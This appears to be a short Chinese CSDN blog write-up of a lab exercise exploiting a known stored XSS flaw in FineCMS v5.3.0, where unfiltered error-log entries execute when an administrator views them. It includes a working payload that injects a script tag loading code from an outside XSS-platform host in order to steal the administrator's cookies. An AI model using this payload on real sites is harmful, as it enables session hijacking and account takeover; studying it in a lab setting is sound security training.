XSS注入(存储型)---zkaq

本文详细介绍了如何针对FineCMS v5.3.0版本的一个已知XSS漏洞进行攻击。攻击者通过控制错误日志信息,当管理员查看错误日志时触发存储型XSS,从而可能窃取到管理员的cookie信息。攻击过程包括访问靶场、寻找漏洞信息、构造攻击payload,并在XSS平台上监视结果。
摘要由CSDN通过智能技术生成

1.访问靶场

靶场cms是Fine CMS,版本是v5.3.0

2.寻找CMS已知漏洞,尝试攻击

网上搜索已知的Fine CMS的XSS漏洞利用信息

参考网站:https://www.freebuf.com/column/165269.html

漏洞根因:简而言之,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发存储型xss,从而窃取管理员的cookie信息。

结合已知漏洞利用方式和准备好的XSS平台攻击代码生成攻击payload:c=mail&m=test<sCRiPt sRC=//hk.sb/m85F></sCrIpT>

然后在xss平台查看获取的信息

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值